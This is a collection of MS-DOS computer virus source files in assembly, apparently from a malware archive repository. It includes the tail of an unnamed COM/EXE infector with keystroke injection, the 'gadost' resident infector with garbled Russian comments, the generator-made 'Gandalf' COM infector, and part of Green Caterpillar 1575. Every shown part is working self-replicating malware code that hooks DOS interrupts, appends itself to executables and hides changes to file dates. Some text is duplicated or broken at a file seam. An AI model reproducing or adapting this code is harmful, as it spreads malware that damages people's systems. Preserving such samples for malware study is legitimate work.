XOR CX,CX ; \ Beginning of file
MOV DX,CX ; /
INT 21H ; DOS service (Move pointer)
BP0380: JB BP0410 ; Follow chain of error branches
CMP EXE_SW,0 ; Test EXE switch
JE BP0390 ; Branch if off
JMP BP0430 ; Process EXE file
; .COM file processing
BP0390: MOV BX,1000H ; 64K of memory wanted
MOV AH,48H ; Allocate memory
INT 21H ; DOS service (Allocate memory)
JNB BP0400 ; Branch if successful
MOV AH,3EH ; Close handle
MOV BX,F_HAND ; Get file handle
INT 21H ; DOS service (Close handle)
JMP BP0530 ; Terminate
BP0400: INC MEM_SW ; Set on memory allocated switch
MOV ES,AX ; Segment of allocated memory
XOR SI,SI ; Start of virus
MOV DI,SI ; Start of allocated memory
MOV CX,OFFSET ENDADR ; Length of virus
REPZ MOVSB ; Copy virus to allocated
MOV DX,DI ; Address after virus
MOV CX,F_SIZE ; Total file size
MOV BX,F_HAND ; Get file handle
PUSH ES ; \ Set DS to ES
POP DS ; /
MOV AH,3FH ; Read handle
INT 21H ; DOS service (Read handle)
BP0410: JB BP0420 ; Follow chain of error branches
ADD DI,CX ; Add previous file size
XOR CX,CX ; \ Beginning of file
MOV DX,CX ; /
MOV AX,4200H ; Move file pointer
INT 21H ; DOS service (Move pointer)
MOV SI,OFFSET VR_SIG ; Signature
MOV CX,6 ; Length to move
REPZ MOVS [DI],CS:VR_SIG ; Copy signature to end
MOV CX,DI ; Length to write
XOR DX,DX ; Start of allocated
MOV AH,40H ; Write handle
INT 21H ; DOS service (Write handle)
BP0420: JB BP0440 ; Follow chain of error branches
JMP BP0510 ; Free memory and reset values
; .EXE file processing
BP0430: MOV CX,1CH ; Length of EXE header
MOV DX,OFFSET EXEHED ; .EXE header store
MOV AH,3FH ; Read handle
INT 21H ; DOS service (Read handle)
BP0440: JB BP0460 ; Follow chain of error branches
MOV EXHD09,1988H ; Negative checksum
MOV AX,EXHD07 ; \ Store initial stack segment
MOV PRG_SS,AX ; /
MOV AX,EXHD08 ; \ Store initial stack pointer
MOV PRG_SP,AX ; /
MOV AX,EXHD10 ; \ Store initial code offset
MOV PRGOFF,AX ; /
MOV AX,EXHD11 ; \ Store initial code segment
MOV PRGSEG,AX ; /
MOV AX,EXHD02 ; Get size of file in pages
CMP EXHD01,0 ; Number of bytes in last page
JE BP0450 ; Branch if none
DEC AX ; One less page
BP0450: MUL BYTSEC ; Bytes per sector
ADD AX,EXHD01 ; \ Add bytes in last page
ADC DX,0 ; /
ADD AX,0FH ; \ Round up
ADC DX,0 ; /
AND AX,0FFF0H ; Clear bottom figure
MOV F_SIZ1,AX ; Save low-order file size
MOV F_SIZ2,DX ; Save high-order file size
ADD AX,OFFSET ENDADR ; \ Add virus length
ADC DX,0 ; /
BP0460: JB BP0480 ; Follow chain of error branches
DIV BYTSEC ; Bytes per sector
OR DX,DX ; Test odd bytes
JZ BP0470 ; Branch if none
INC AX ; One more page for odd bytes
BP0470: MOV EXHD02,AX ; Store size of file in pages
MOV EXHD01,DX ; Store bytes in last page
MOV AX,F_SIZ1 ; Low-order file size
MOV DX,F_SIZ2 ; High-order file size
DIV PARAGR ; Size of a paragraph
SUB AX,EXHD04 ; Size of header in paragraphs
MOV EXHD11,AX ; Initial code segment
MOV EXHD10,OFFSET BP0030 ; Initial code offset
MOV EXHD07,AX ; Initial stack segment
MOV EXHD08,OFFSET ENDADR ; Initial stack pointer
XOR CX,CX ; \ Beginning of file
MOV DX,CX ; /
MOV AX,4200H ; Move file pointer
INT 21H ; DOS service (Move pointer)
BP0480: JB BP0490 ; Follow chain of error branches
MOV CX,1CH ; Length of EXE header
MOV DX,OFFSET EXEHED ; .EXE header store
MOV AH,40H ; Write handle
INT 21H ; DOS service (Write handle)
BP0490: JB BP0500 ; Follow chain of error branches
CMP AX,CX ; Has same length been written
JNE BP0510 ; Branch if not
MOV DX,F_SIZ1 ; Low-order file size
MOV CX,F_SIZ2 ; High-order file size
MOV AX,4200H ; Move file pointer
INT 21H ; DOS service (Move pointer)
BP0500: JB BP0510 ; Follow chain of error branches
XOR DX,DX ; Address beginning of virus
MOV CX,OFFSET ENDADR ; Length of virus
MOV AH,40H ; Write handle
INT 21H ; DOS service (Write handle)
ASSUME DS:NOTHING
BP0510: CMP MEM_SW,0 ; Test memory allocated switch
JE BP0520 ; Branch if off
MOV AH,49H ; Free allocated memory
INT 21H ; DOS service (Free memory)
BP0520: CMP F_HAND,-1 ; Test file handle
JE BP0530 ; Terminate if none
MOV BX,F_HAND ; Get file handle
MOV DX,F_DATE ; Get file date
MOV CX,F_TIME ; Get file time
MOV AX,5701H ; Set file date and time
INT 21H ; DOS service (Set file date)
MOV AH,3EH ; Close handle
INT 21H ; DOS service (Close handle)
LDS DX,F_PATH ; Address program pathname
MOV CX,F_ATTS ; Load file attributes
MOV AX,4301H ; Set file attributes
INT 21H ; DOS service (Set attributes)
LDS DX,INT_24 ; Original interrupt 24H address
MOV AX,2524H ; Set interrupt 24H
INT 21H ; DOS service (Set int)
BP0530: POP ES
POP DS
POP DI
POP SI
POP DX
POP CX
POP BX
POP AX
POPF
JMP INT_21 ; Interrupt 21H
; Interrupt 16H routine
BP0540: PUSHF ; Fake an interrupt
CMP AH,0 ; Get a token function?
JE BP0550 ; Branch if yes
POPF ; Fake interrupt not needed
JMP INT_16 ; Pass on to original interrupt
BP0550: CALL INT_16 ; Deal with original interrupt
PUSH AX
PUSH BX
PUSH DI
PUSH DS
PUSH ES
PUSH CS ; \ Set DS to CS
POP DS ; /
XOR BX,BX ; \ Set ES to zero
MOV ES,BX ; /
ASSUME DS:CODE,ES:RAM
CMP OUT_SW,0 ; Is output switch on?
JNE BP0630 ; Branch if yes
OR AL,20H ; Convert to lower case
XOR AL,0AFH ; Decrypt character
MOV DI,OFFSET TABLE ; Address first entry
BP0560: CMP BYTE PTR [DI],0 ; Is this the end of the table?
JE BP0590 ; Branch if yes
XOR BX,BX ; Clear register
MOV BL,[DI+1] ; Get current character pointer
ADD BX,[DI+2] ; Add current entry pointer
CMP AL,[BX] ; Is character the one we want?
JE BP0570 ; Branch if yes
MOV BYTE PTR [DI+1],0 ; Clear character pointer
JMP BP0580
BP0570: INC BYTE PTR [DI+1]
BP0580: ADD DI,4 ; Next entry
JMP BP0560 ; Process next entry
BP0590: MOV DI,OFFSET TABLE ; Address first entry
BP0600: CMP BYTE PTR [DI],0 ; Is this the end of the table?
JE BP0610 ; Branch if yes
MOV AL,[DI+1] ; Get current character pointer
CMP AL,[DI] ; Do we have a complete match?
JNE BP0620 ; Branch if not
MOV TABOUT,DI ; Save relevant pointer
INC OUT_SW ; Set on output switch
MOV AX,40H ; \ Address RAM
MOV ES,AX ; /
ASSUME ES:RAM40
MOV AX,BW041A ; Get key token in pointer
MOV BW041C,AX ; Set key token out pointer
CALL BP0640 ; Put a character into the buffer
BP0610: POP ES
POP DS
POP DI
POP BX
POP AX
IRET
BP0620: ADD DI,4 ; Next entry
JMP BP0600 ; Process next entry
BP0630: MOV AX,40H ; \ Address RAM
MOV ES,AX ; /
CALL BP0640 ; Put a character into the buffer
XOR BX,BX ; Clear register
MOV BL,[DI+1] ; Get current character pointer
ADD BX,[DI+2] ; Add entry pointer
CMP BYTE PTR [BX],0 ; Was that the last character?
JNE BP0610 ; Branch if not
MOV OUT_SW,0 ; Set off output switch
JMP BP0610
BP0640: MOV DI,TABOUT ; Address relevant table entry
XOR BX,BX ; Clear register
MOV BL,[DI+1] ; Get current character pointer
ADD BX,[DI+2] ; Add entry pointer
MOV AL,[BX] ; Get the character
XOR AL,0AFH ; Decrypt character
INC BYTE PTR [DI+1] ; Next character
MOV AH,AL ; Copy for translate
MOV BX,OFFSET KEYTAB ; Address key number table
XLAT ; Get key number
XCHG AH,AL ; Reserve order
MOV BX,BW041C ; Get key token out pointer
MOV ES:[BX],AX ; Put key token into buffer
INC BX ; \ Next buffer position
INC BX ; /
CMP BX,BW0482 ; Passed end of buffer?
JNE BP0650 ; Branch if not
MOV BX,BW0480 ; Get buffer start
BP0650: MOV BW041C,BX ; Save new key token out pointer
RET
; Stack area - This is also necessary to make the virus a complete
; number of paragraphs
DB 04CH, 002H, 0AAH, 031H, 09EH, 002H, 0A5H, 031H
ENDADR EQU $
CODE ENDS
END START
ete
; number of paragraphs
DB 04CH,
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

228
MSDOS/Virus.MSDOS.Unknown.gadost.asm Normal file
View File

@ -0,0 +1,228 @@
;
; <09>¥ª®¬¥­¤ã¥âáï ®âª®¬¯¨«¨à®¢ âì, § ¯ãáâ¨âì ¨ ⮫쪮 ¯®â®¬ à áᬠâਢ âì
; source code. (‚ᥠࠢ­® ‚ ¬ ¢ ­¥¬ à §¡¨à âìáï ¯à¨¤¥âáï :-)).
;
; Œ¨«¥­ìª ï (¬ «¥­ìª ï) £ ¤®áâì, ¬¥à§®áâì, ¤àï­ì, ᪮⨭ ...
;
; ®¡é¥¬, ¢¨àãá, ª®â®àë© § à ¦ ¥â ¢á直¥ â ¬ ä ©«ë ¯à¨ ¯®¯ë⪥ ¨å
; § ¯ãáâ¨âì - ¯®ª  á ä ¬¨«¨¥© .COM, ¦¨¢¥â £¤¥-â® ­  ç¥à¤ ª¥ ¯®¤ ¢¥ªâ®à®¬
; 21-£® ¨­â¥àà ¯â , ­¥ áªà뢠¥â ᢮¥ ⥫® ¦¨à­®¥ ¢ ãâ¥á å, § à ¦¥­­ë¥
; ä ©«ë ®¯®§­ ¥â ¯® èãਪ¥­ã (â ª®© ⨯  §¢¥§¤®çª¨, ¨á¯®«ì§ã¥âáï ã
; ¢®áâ®ç­ëå ­ à®¤®¢ ¤«ï ®âᥪ ­¨ï £®«®¢ë ¨ ¥é¥ ª®¥-祣® ã ¡«¨¦­¥£®
; ᢮¥£®), à á¯®«®¦¥­­®¬ã ¢ 4-®¬ ¡ ©â¥ ®â ­ ç « ,   ᢮¥ ­ «¨ç¨¥ ¢
; ¯ ¬ï⨠¯à®¢¥àï¥â â ª: ª« ¤¥â ¢ AX á«®¢® BABA (¢ á¬ëá«¥, ­¥ â ª®¥
; á«®¢®,   word 0BABAh), ¢ë¯®«­ï¥â 21-¥ ¨­â¥à࠯⮢ ­¨¥ ¨ ᬮâà¨â,
; ¦¥« îâ «¨ íâã ¡ ¡ã 0FACCh. …᫨ ¦¥« îâ, â® á â çª®© ¢á¥ ¯®­ïâ­®.
;
; Copyright (c) 1992, Gogi&Givi International
;
.model tiny
.code
org 0100h
VirPar equ (endvir-StartVirus)/16+2 ; ‘ª®ª  ã ¢¨àãá  ¯ à £à ä®¢
VirLen equ (endvir-StartVirus) ; <20> §¬¥àë ¡îáâ  ¢¨àãá  ¢
; âà¥ã£®«ì­ëå ª¨«®¬¥âà å
gadost:
db 'è' ; …â® ª®¤ CALL
dw StartVirus-$-2 ; € ¥â® ᬥ饭¨¥ ­  StartVirus
db 15,09h ; ˜ãਪ¥­ ¨ ®áâ â®ª ®â mov ah,
int 21h ; € íâ® ¢á¥ ­®à¬ «ì­ë©
ret ; ª®¤ ¦¥àâ¢ë
GoodMessage db '’®¢ à¨é ‹®§¨­áª¨©! ”€Š ž!',13,10,'$'
; <20> ª®áâ­ë© ¬¥áá ¤¦ ¤«ï ¤ï¤¨
; ‹®§¨­áª®£®
StartVirus:
pop si ; <20>â® ç⮡ë 㧭 âì, ªã¤  ­ á
call EntryPoint ; § ­¥á«®
EntryPoint:
pop si ; ‚믨孥¬  ¤à¥á ­ ç «  § à §ë
push ds ; ‘®åà ­¨¬ ¯ àã-âனªã ॣ¨áâ஢...
push es
push si
mov ax,cs ; ‚®ááâ ­®¢¨¬ ᯥàâë¥ ¡ ©âë
mov es,ax ; ¨§ § ¤­¨æë ä ©« 
mov ds,ax
mov di,0100h
add si,RobbedBytes-EntryPoint
mov cx,4
cld ; <20>â® ¢®ááâ ­®¢«¥­¨¥
rep movsb
pop si
mov ax,0BABAh ; <20>஢¥à¨¬, å®âïâ «¨ ¡ ¡ã -
int 21h ; ¢ á¬ëá«¥, ¥áâì «¨ ¬ë
cmp ax,0FACCh ; ¢ ¯ ¬ïâ¨
jne NeedsBaba ; ‚¨¤ âì, å®âïâ ¥¥, த¨¬ãî!
jmp FucksNow ; …¥ 㦥 ®¡à ¡ â뢠îâ
NeedsBaba:
pop es
push es
mov ax,es ; Žâà뢠¥¬ ᥡ¥ á¥­â PSP
dec ax
mov es,ax ; ‘⮫쪮 ¢ ­ è¥© ¯ ª®áâ¨
mov ax,es:[3] ; ¯ à £à ä®¢
sub ax,virpar
mov es:[3],ax
mov bx,es:[1] ; <20>«îá ®¤­  PSP
add bx,ax ; ‚ᥠᢠ«¨¢ ¥¬ ¢ ªãçã
mov es,bx
push ds ; <20>ã, íâ® ¯®­ïâ­®
xor ax,ax
mov ds,ax
mov ax,ds:[21h*4] ; ‡ å¢ â뢠¥¬ áâ àë©
mov cs:[si+Off21-EntryPoint],ax ; ¢¥ªâ®à int 21h
mov ax,ds:[21h*4+2] ; á¬ëá«¥, ®­ ­¥ áâ àë©,
mov cs:[si+Seg21-EntryPoint],ax ; ®­ ¤ ¦¥ «ãçè¥ ­®¢®£®
pop ds
xor di,di ; ‡ á®¢ë¢ ¥¬ ¢ ­ ç «®
push si ; ­¨ç¥©­®£® ᥣ¬¥­â 
sub si,EntryPoint-StartVirus ; £¤¥-â® ­  § ¤¢®àª å
mov cx,VirLen ; ¯ ¬ï⨠­ è¥ £­ãá­®¥
rep movsb ; ⥫®
pop si
push ds ; ˆ áâ ¢¨¬ ­  㪠§ ­­®¥
xor ax,ax ; £­ãá­®¥ ⥫® ¢¥ªâ®à
mov ds,ax ; ¯à¥à뢠­¨ï 21h
mov word ptr ds:[21h*4],Int21Server-StartVirus
mov ds:[21h*4+2],es
pop ds
FucksNow:
pop es ; <20>â® ¢ á«ãç ¥, ¥á«¨
pop ds ; ¯à¥¤«®¦¥­­®© ¦¥­é¨­®©
mov si,0100h ; (¢¨àãᮬ) 㦥 ®¡« ¤ îâ
push si
xor ax,ax ; ‚ᥠ¢®ááâ ­ ¢«¨¢ ¥¬ ª
xor bx,bx ; ï¤à¥­¥ ”¥­¥ - ¨ ¤®¬®©,
xor di,di ; ª ¬ ¬¥
ret
Int21Server:
pushf ; <20>â® ­®¢ë© ®¡à ¡®â稪
push ax ; 21-£® ¨­â 
push bx
push ds
cmp ax,0BABAh ; ’ãâ ¬ë ãáâ ­®¢¨¬ ॠªæ¨î
jne NotTest ; ­  ¯à¥¤«®¦¥­¨¥ ¦¥­é¨­ë
pop ds ; (¨«¨ í४æ¨î)
pop bx
pop ax
popf
mov ax,0FACCh ; <20>â® ­®à¬ «ì­ ï í४æ¨ï
iret ; (â® ¥áâì ॠªæ¨ï)
NotTest:
push cx ; ’ãâ ¬ë ª« áá­® ¨§¢à â¨¬áï,
mov cx,ax ; ç⮡ë ᤥ« âì ¢¨¤, çâ®
xchg cl,ch ; ­ ¬ ᮢᥬ ­¥ ­ã¦­®
xor cl,4Bh ; ®¡à ¡ â뢠âì äã­ªæ¨î EXEC
pop cx ; (—⮡ ‹®§¨­áª¨© £®«®¢ã «®¬ «
jz Exec ; ¨ ç⮡ ã ­¥£® ®çª¨ § ¯®â¥«¨)
jmp NotExec
Exec:
mov bx,dx ; <20>®ª« ¤¥¬ ᬥ饭¨¥ ¨¬¥­¨
; § ¯ã᪠¥¬®£® ä ©«  ¢ BX
SearchZero:
cmp byte ptr ds:[bx],0 ; <20>஢¥à¨¬ ­  §¥àã
je ZeroFound ; €å, ª®­¥æ ¨¬¥­¨!
inc bx
jmp SearchZero
ZeroFound:
sub bx,11 ; —㤥᭮!
push es ; <20>஢¥à¨¬, ¢¤à㣠ª ª®©-
mov ax,cs ; ­¨¡ã¤ì ¯á¨å ¦¥« ¥â
mov es,ax ; § à §¨âì COMMAND.COM
mov cx,11
mov di,offset CommandName-StartVirus
Compare:
mov al,ds:[bx] ; <20>â® ¢á¥ á«®¦­ ï ¨ ­ã¤­ ï
cmp al,es:[di] ; ¯à®æ¥¤ãà  ¯à®¢¥àª¨...
jne NotCommand
inc bx
inc di
dec cx ; ‚ᥠ¯à®¢¥à塞, ¯à®¢¥à塞...
cmp cx,0
jne Compare
pop es
jmp Quit21Server ; —â® ¦ ï - ¤¥¡¨« COMMAND.COM
; § à ¦ âì?!
NotCommand:
pop es ; ’ ¬ ¬ë á®å࠭﫨 祣®©-â 
push ax
push bx ; ‘®åà ­¨¬ ¢á¥, çâ® ¯«®å®
push cx ; «¥¦¨â, çâ®¡ë ­¥ ¯à®¯ «®
push dx
mov ax,3D02h ; Žâªã¯®à¨¢ ¥¬ ª«¨¥­â  (ä ©«)
int 21h
jc EndExec ; <20>뢠îâ ¨ £­ãâë¥ ¯à®¡ª¨
mov bx,ax ; <20>®ª« ¤¥¬ ¯à®¡ªã ®â ä ©«  ¢ BX
mov cx,4 ; •®â¥«®áì ¡ë áç¨â âì 4 ¡ ©â 
mov ax,cs
mov ds,ax
mov ah,3Fh ; ¬¥áâ®, £¤¥ «¥¦ «¨
mov dx,offset RobbedBytes-StartVirus
int 21h ; ᯥàâë¥ ¡ ©âë
jc EndExec
cmp word ptr cs:[RobbedBytes-StartVirus],'ZM'
je CloseFile ; <20>  䨣  EXE § à ¦ âì???
xor cx,cx
xor dx,dx
mov ax,4202h
int 21h ; ‹¥§¥¬ ¢ § ¤­¨æã ä ©« 
cmp ax,1000 ; <20>  䨣  ­ ¬ ä ©«ë ¬¥­ìè¥
jl CloseFile ; 1 ª¨«®?
cmp ax,64000 ; € ⥬ ¡®«¥¥ ¡®«ìè¥ 64
ja CloseFile
sub ax,3
mov cs:[FileSize-StartVirus],ax ; ˜ãਪ¥­  ?
cmp byte ptr cs:[RobbedBytes-StartVirus+3],15
je CloseFile ; ˆª¥¡ ­ !
mov ax,cs
mov ds,ax
mov ah,40h ; ƒ«ã¯ë© ¢¨àãá ஡ª® ¯àïç¥â
xor dx,dx ; ⥫® ¦¨à­®¥ ¢ § ¤­¨æ¥ ä ©« 
mov cx,VirLen
int 21h
xor cx,cx ; ˆ ¢ ­ ç «® ã¡¥£ ¥â, ç⮡ë
xor dx,dx ; JUMP â㤠 ¯®áâ ¢¨âì
mov ax,4200h
int 21h
mov ah,40h
mov dx,offset SuperByte-StartVirus ; ” ©« ­  â® ¨ ä ©«, ç⮡ë
mov cx,4 ; ¢ë§ë¢ âì ¯®¤ª«¥¥­­ë©
int 21h ; ᧠¤¨ ¢¨àãá
CloseFile:
mov ah,3Eh ; ‘¨¥ § ªàë⨥ ä ©«  - ­ ¬
int 21h ; ®­ ¡®«ìè¥ ¢  é¥ ­¥ ­ã¦¥­
EndExec:
pop dx ; Œë â ¬, ª ¦¨áì, á®å࠭﫨
pop cx ; ®¯ïâì 祣®©-â ?
pop bx
pop ax
jmp Quit21Server ; ˆ ¯® ¡ ¡ ¬!
NotExec:
; <20>  á«ãç © á«¥¤ãîé¨å 堬᪨å ࠧࠡ®â®ª
Quit21Server:
pop ds ; —¥¬ ¦¥ ¬ë ⮫쪮
pop bx ; STACK' ­ ­¥ ­ ¯®«­ï«¨?!
pop ax
popf ; …é¥ ¨ ä« £ ¬¨?!!!
db 0EAh
Off21 dw 0000h ; ’ ª ¡ã¤¥â á ª ¦¤ë¬, ªâ®...
Seg21 dw 0000h
RobbedBytes:
mov dx,offset GoodMessage ; <20>â® ¢à®¤¥ ª ª ᯥàâë¥ ¡ ©âë
db 0B4h
SuperByte db 'è' ; € íâ® ­¥ ᯥàâë¥, ­®
FileSize dw 0000h ; ⮦¥ å®à®è¨¥
db 15 ; ˜ãਪ¥­ 
db '=>' ; <20>â® ¤«ï ªà á®âë
CommandName db 'COMMAND.COM<=' ; € íâ® ®â COMMAND.COM
endvir:
end gadost ; ˆ ¢á¥!

202
MSDOS/Virus.MSDOS.Unknown.gandalf.asm Normal file
View File

@ -0,0 +1,202 @@
; Virus generated by Gý 0.70á
; Gý written by Dark Angel of Phalcon/Skism
; File: GANDALF.ASM
; Gandalf by Ender
.model tiny
.code
; Assemble with:
; TASM /m3 filename.ASM
; TLINK /t filename.OBJ
org 0100h
carrier:
db 0E9h,0,0 ; jmp start
start:
call next
next:
pop bp
sub bp, offset next
mov ah, 0047h ; Get directory
lea si, [bp+offset origdir+1]
cwd ; Default drive
int 0021h
lea dx, [bp+offset newDTA]
mov ah, 001Ah ; Set DTA
int 0021h
mov ax, 3524h
int 0021h
push es
push bx
lea dx, [bp+INT24] ; ASSumes ds=cs
mov ax, 2524h
int 0021h
push cs
pop es
restore_COM:
mov di, 0100h
push di
lea si, [bp+offset old3]
movsb
movsw
mov byte ptr [bp+numinfect], 0000h
traverse_loop:
lea dx, [bp+offset COMmask]
call infect
cmp [bp+numinfect], 0007h
jae exit_traverse ; exit if enough infected
mov ah, 003Bh ; CHDIR
lea dx, [bp+offset dot_dot] ; go to previous dir
int 0021h
jnc traverse_loop ; loop if no error
exit_traverse:
lea si, [bp+offset origdir]
mov byte ptr [si], '\'
mov ah, 003Bh ; restore directory
xchg dx, si
int 0021h
pop dx
pop ds
mov ax, 2524h
int 0021h
mov dx, 0080h ; in the PSP
mov ah, 001Ah ; restore DTA to default
int 0021h
return:
ret
old3 db 0cdh,20h,0
INT24:
mov al, 0003h
iret
infect:
mov cx, 0007h ; all files
mov ah, 004Eh ; find first
findfirstnext:
int 0021h
jc return
mov ax, 4300h
lea dx, [bp+newDTA+30]
int 0021h
jc return
push cx
push dx
mov ax, 4301h ; clear file attributes
push ax ; save for later use
xor cx, cx
int 0021h
mov ax, 3D02h
lea dx, [bp+newDTA+30]
int 0021h
mov bx, ax ; xchg ax,bx is more efficient
mov ax, 5700h ; get file time/date
int 0021h
push cx
push dx
mov ah, 003Fh
mov cx, 001Ah
lea dx, [bp+offset readbuffer]
int 0021h
mov ax, 4202h
xor cx, cx
cwd
int 0021h
cmp word ptr [bp+offset readbuffer], 'ZM'
jz jmp_close
mov cx, word ptr [bp+offset readbuffer+1] ; jmp location
add cx, heap-start+3 ; convert to filesize
cmp ax, cx ; equal if already infected
jl skipp
jmp_close:
jmp close
skipp:
cmp ax, 65535-(endheap-start) ; check if too large
ja jmp_close ; Exit if so
cmp ax, (heap-start) ; check if too small
jb jmp_close ; Exit if so
lea si, [bp+offset readbuffer]
lea di, [bp+offset old3]
movsb
movsw
sub ax, 0003h
mov word ptr [bp+offset readbuffer+1], ax
mov dl, 00E9h
mov byte ptr [bp+offset readbuffer], dl
lea dx, [bp+offset start]
mov ah, 0040h ; concatenate virus
mov cx, heap-start
int 0021h
xor cx, cx
mov ax, 4200h
xor dx, dx
int 0021h
mov cx, 0003h
lea dx, [bp+offset readbuffer]
mov ah, 0040h
int 0021h
inc [bp+numinfect]
close:
mov ax, 5701h ; restore file time/date
pop dx
pop cx
int 0021h
mov ah, 003Eh
int 0021h
pop ax ; restore file attributes
pop dx ; get filename and
pop cx ; attributes from stack
int 0021h
mov ah, 004Fh ; find next
jmp findfirstnext
signature db '[PS/Gý]',0 ; Phalcon/Skism Gý
creator db 'Ender',0
virusname db 'Gandalf',0
COMmask db '*.COM',0
dot_dot db '..',0
heap:
newDTA db 43 dup (?)
origdir db 65 dup (?)
numinfect db ?
readbuffer db 1ah dup (?)
endheap:
end carrier

929
MSDOS/Virus.MSDOS.Unknown.gc1575a.asm Normal file
View File

@ -0,0 +1,929 @@
; Green_Caterpillar.1575.A
; TASM /M
seg000 segment byte public 'CODE'
assume cs:seg000
org 100h
assume es:nothing, ss:nothing, ds:seg000
start proc near
jmp short RealStart
db 90h
Int21Ofs dw 0
Int21Seg dw 0
Int1COfs dw 0
Int1CSeg dw 0
exeHeader dw 20CDh
exeMOD dw 9090h
exeDIV dw 0
exeNumSeg dw 0
exeHeadSize dw 0
exeMinPara dw 0
exeMaxPara dw 0
exeSS dw 0
exeSP dw 0
exeCheckSum dw 0
exeIP dw 0
exeCS dw 0
StartCS dw 0
StartIP dw 0
FileSizeHW dw 0
FileSizeLW dw 0
StoreSS dw 0
DTAOffset dw 0
DTASegment dw 0
StartSS dw 0
StoreBP dw 0
StoreES dw 0
Int24Seg dw 0
Int24Ofs dw 0
GenCounter db 16
byte_0_13C db 7, 57h, 75h, 2, 5Ch, 7, 70h, 0, 16h, 0, 0BFh, 0Bh, 5Ch, 7, 70h, 0
RealStart:
push es
push ds
mov ax, es
push cs
pop ds ; DS = CS
push cs
pop es ; ES = CS
assume es:seg000
mov StoreES, ax
mov ax, ss
mov StoreSS, ax
mov al, 2
out 20h, al ; Interrupt controller, 8259A.
cld
xor ax, ax
mov ds, ax ; DS points to IVT
assume ds:nothing
xor si, si
mov di, 13Ch
mov cx, 16
repne movsb
push ds
pop ss ; SS = DS
assume ss:nothing
mov bp, 8
xchg bp, sp
call near ptr sub_0_1C5
jmp StoreFilename
start endp
FixupInts:
call GetInt24Vecs
call CheckInfection
jz AlreadyInf ; Infected Already? Then JMP.
mov al, ds:FileType
push ax
call InfectCOM
pop ax
mov ds:FileType, al
jmp short RestoreFile
nop
AlreadyInf:
call GetIntVectors
call CheckForInstall
cmp ds:FileType, 0 ; No File Type?
jnz RestoreFile ; No? Then JMP.
mov ax, 4C00h
int 21h ; Exit To DOS
RestoreFile: ; COM File?
cmp ds:FileType, 'C'
jnz RestoreEXE ; No? Then JMP.
RestoreCOM:
pop ds
assume ds:seg000
pop es
assume es:nothing
push cs
pop ds ; DS = CS
pop es
push es
mov di, offset start
mov si, offset exeHeader
mov cx, 12
repne movsb ; Restore Original 12 Bytes
push es
pop ds ; DS = ES
mov ax, offset start
push ax
xor ax, ax
retf ; Return to Original COM Program
sub_0_1C5 proc far
mov si, 6
lodsw
cmp ax, 192h
jz RestoreCOM
cmp ax, 179h
jnz loc_0_1D6
jmp loc_0_27F
loc_0_1D6:
cmp ax, 1DCh
jz RestoreEXE
retn
RestoreEXE:
pop ds
pop es
mov bx, cs:exeSS
sub bx, cs:StartSS
mov ax, cs
sub ax, bx
mov ss, ax
assume ss:nothing
mov bp, cs:StoreBP
xchg bp, sp
mov bx, cs:exeCS
sub bx, cs:StartCS
mov ax, cs
sub ax, bx
push ax
mov ax, cs:StartIP
push ax
retf
sub_0_1C5 endp
Caterpillar db '#'
db 1Ah
db '<'
db '#'
db '/'
db '-'
db '-'
db '!'
db '.'
db '$'
db 0Eh
db '#'
db '/'
db '-'
db 'à'
FileName db 'A:10KBYTE.EXE',0
db 0 ;
db 24h ; $
db 24h ; $
db 24h ; $
db 24h ; $
db 24h ; $
CheckInfection proc near
mov ax, 3D02h
mov dx, offset FileName
int 21h ; Open File
jnb CheckOpened ; No problems? Then JMP.
clc
retn
CheckOpened:
mov StoreSS, ax
mov dx, offset NewInt24
mov ax, 2524h
int 21h ; Set New Int 24h Vectors
mov ax, 4202h
mov bx, StoreSS
mov cx, 0FFFFh
mov dx, 0FFFEh
int 21h ; Move Pointer to End of File - 1
mov dx, offset CheckBytes
mov ah, 3Fh
mov bx, StoreSS
mov cx, 2
int 21h ; Read In 2 Bytes
mov ah, 3Eh
int 21h ; Close File
push ds
mov dx, Int24Ofs
mov ax, Int24Seg
mov ds, ax
mov ax, 2524h
int 21h ; Restore Int 24h Vectors
pop ds
cmp CheckBytes, 0A0Ch ; Infected Already?
clc
retn
CheckInfection endp
CheckBytes dw 0
loc_0_27F:
cmp ax, 22Dh
jz InfectCOM
push ds
pop es ; ES = DS
assume es:seg000
push cs
pop ds ; DS = CS
mov ax, StoreSS
mov ss, ax ; SS = SS
assume ss:nothing
xchg bp, sp
mov si, offset byte_0_13C
mov di, 0
mov cx, 16
cld
repne movsb
jmp FixupInts
InfectCOM proc near
mov al, 'C'
mov FileType, al
mov al, 8
out 70h, al ; CMOS Memory:
; used by real-time clock
in al, 71h ; CMOS Memory
mov GenCounter, al
mov dx, offset FileName
mov ax, 3D02h
int 21h ; Open File
jnb COMOpened ; No problems? Then JMP.
retn
COMOpened: ; Store Handle
mov StoreSS, ax
mov dx, offset exeHeader
mov bx, StoreSS
mov cx, 12
mov ah, 3Fh
int 21h ; Read In 12 Bytes From File
mov ax, 4202h
xor cx, cx
xor dx, dx
int 21h ; Move Pointer to End of File
push ax
add ax, 10h
and ax, 0FFF0h
push ax
shr ax, 1
shr ax, 1
shr ax, 1
shr ax, 1 ; Fix For Segment Size
mov di, offset VirusFixedSeg
stosw ; Store Segment Value
pop ax
pop bx
sub ax, bx
mov cx, 1575
add cx, ax
mov dx, offset start
sub dx, ax
mov bx, StoreSS
mov ah, 40h
int 21h ; Write Virus to File
mov ax, 4200h
xor cx, cx
xor dx, dx
int 21h ; Move Pointer to Beginning of File
mov ah, 40h
mov bx, StoreSS
mov cx, 12
mov dx, offset COMHeader
int 21h ; Write COM Header to File
mov ah, 3Eh
mov bx, StoreSS
int 21h ; Close File
retn
InfectCOM endp
COMHeader:
push cs
mov ax, cs
